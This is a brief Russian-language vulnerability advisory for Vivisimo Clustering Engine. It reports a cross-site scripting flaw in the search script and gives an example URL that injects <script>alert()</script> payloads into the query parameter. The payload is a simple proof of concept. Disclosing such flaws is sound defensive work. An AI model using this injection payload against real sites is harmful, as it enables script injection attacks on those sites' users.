Программа: Vivisimo Clustering Engine 

Уязвимость обнаружена в Vivisimo Clustering Engine. Удаленный пользователь может выполнить XSS нападение. 

Уязвимость обнаружена в поисковом сценарии. 

Пример/Эксплоит: 

http://[target]/search? query=<script>alert(«Hello» )</script>&
lt;script>alert("goodbye")</script>



Оставить мнение